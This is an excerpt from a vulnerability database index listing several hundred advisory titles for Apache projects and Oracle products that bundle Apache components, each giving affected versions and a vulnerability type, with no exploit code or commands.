7400| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
7401| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
7402| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
7403| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
7404| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
7405| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
7406| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
7407| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
7408| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
7409| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
7410| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
7411| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
7412| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
7413| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
7414| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
7415| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
7416| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
7417| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
7418| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
7419| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
7420| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
7421| [136370] Apache Fineract up to 1.2.x sql injection
7422| [136369] Apache Fineract up to 1.2.x sql injection
7423| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
7424| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
7425| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
7426| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
7427| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
7428| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
7429| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
7430| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
7431| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
7432| [134416] Apache Sanselan 0.97-incubator Loop denial of service
7433| [134415] Apache Sanselan 0.97-incubator Hang denial of service
7434| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
7435| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
7436| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
7437| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
7438| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
7439| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
7440| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
7441| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
7442| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
7443| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
7444| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
7445| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
7446| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
7447| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
7448| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
7449| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
7450| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
7451| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
7452| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
7453| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
7454| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
7455| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
7456| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
7457| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
7458| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
7459| [131859] Apache Hadoop up to 2.9.1 privilege escalation
7460| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
7461| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
7462| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
7463| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
7464| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
7465| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
7466| [130629] Apache Guacamole Cookie Flag weak encryption
7467| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
7468| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
7469| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
7470| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
7471| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
7472| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
7473| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
7474| [130123] Apache Airflow up to 1.8.2 information disclosure
7475| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
7476| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
7477| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
7478| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
7479| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
7480| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
7481| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
7482| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
7483| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
7484| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
7485| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
7486| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
7487| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
7488| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
7489| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
7490| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
7491| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
7492| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
7493| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
7494| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
7495| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
7496| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
7497| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
7498| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
7499| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
7500| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
7501| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
7502| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
7503| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
7504| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
7505| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
7506| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
7507| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
7508| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
7509| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
7510| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
7511| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
7512| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
7513| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
7514| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
7515| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
7516| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
7517| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
7518| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
7519| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
7520| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
7521| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
7522| [127007] Apache Spark Request Code Execution
7523| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
7524| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
7525| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
7526| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
7527| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
7528| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
7529| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
7530| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
7531| [126346] Apache Tomcat Path privilege escalation
7532| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
7533| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
7534| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
7535| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
7536| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
7537| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
7538| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
7539| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
7540| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
7541| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
7542| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
7543| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
7544| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
7545| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
7546| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
7547| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
7548| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
7549| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
7550| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
7551| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
7552| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
7553| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
7554| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
7555| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
7556| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
7557| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
7558| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
7559| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
7560| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
7561| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
7562| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
7563| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
7564| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
7565| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
7566| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
7567| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
7568| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
7569| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
7570| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
7571| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
7572| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
7573| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
7574| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
7575| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
7576| [123197] Apache Sentry up to 2.0.0 privilege escalation
7577| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
7578| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
7579| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
7580| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
7581| [122800] Apache Spark 1.3.0 REST API weak authentication
7582| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
7583| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
7584| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
7585| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
7586| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
7587| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
7588| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
7589| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
7590| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
7591| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
7592| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
7593| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
7594| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
7595| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
7596| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
7597| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
7598| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
7599| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
7600| [121354] Apache CouchDB HTTP API Code Execution
7601| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
7602| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
7603| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
7604| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
7605| [120168] Apache CXF weak authentication
7606| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
7607| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
7608| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
7609| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
7610| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
7611| [119306] Apache MXNet Network Interface privilege escalation
7612| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
7613| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
7614| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
7615| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
7616| [118143] Apache NiFi activemq-client Library Deserialization denial of service
7617| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
7618| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
7619| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
7620| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
7621| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
7622| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
7623| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
7624| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
7625| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
7626| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
7627| [117115] Apache Tika up to 1.17 tika-server command injection
7628| [116929] Apache Fineract getReportType Parameter privilege escalation
7629| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
7630| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
7631| [116926] Apache Fineract REST Parameter privilege escalation
7632| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
7633| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
7634| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
7635| [115883] Apache Hive up to 2.3.2 privilege escalation
7636| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
7637| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
7638| [115518] Apache Ignite 2.3 Deserialization privilege escalation
7639| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
7640| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
7641| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
7642| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
7643| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
7644| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
7645| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
7646| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
7647| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
7648| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
7649| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
7650| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
7651| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
7652| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
7653| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
7654| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
7655| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
7656| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
7657| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
7658| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
7659| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
7660| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
7661| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
7662| [113895] Apache Geode up to 1.3.x Code Execution
7663| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
7664| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
7665| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
7666| [113747] Apache Tomcat Servlets privilege escalation
7667| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
7668| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
7669| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
7670| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
7671| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
7672| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
7673| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
7674| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
7675| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
7676| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
7677| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
7678| [112885] Apache Allura up to 1.8.0 File information disclosure
7679| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
7680| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
7681| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
7682| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
7683| [112625] Apache POI up to 3.16 Loop denial of service
7684| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
7685| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
7686| [112339] Apache NiFi 1.5.0 Header privilege escalation
7687| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
7688| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
7689| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
7690| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
7691| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
7692| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
7693| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
7694| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
7695| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
7696| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
7697| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
7698| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
7699| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
7700| [112114] Oracle 9.1 Apache Log4j privilege escalation
7701| [112113] Oracle 9.1 Apache Log4j privilege escalation
7702| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
7703| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
7704| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
7705| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
7706| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
7707| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
7708| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
7709| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
7710| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
7711| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
7712| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
7713| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
7714| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
7715| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
7716| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
7717| [110701] Apache Fineract Query Parameter sql injection
7718| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
7719| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
7720| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
7721| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
7722| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
7723| [110106] Apache CXF Fediz Spring cross site request forgery
7724| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
7725| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
7726| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
7727| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
7728| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
7729| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
7730| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
7731| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
7732| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
7733| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
7734| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
7735| [108938] Apple macOS up to 10.13.1 apache denial of service
7736| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
7737| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
7738| [108935] Apple macOS up to 10.13.1 apache denial of service
7739| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
7740| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
7741| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
7742| [108931] Apple macOS up to 10.13.1 apache denial of service
7743| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
7744| [108929] Apple macOS up to 10.13.1 apache denial of service
7745| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
7746| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
7747| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
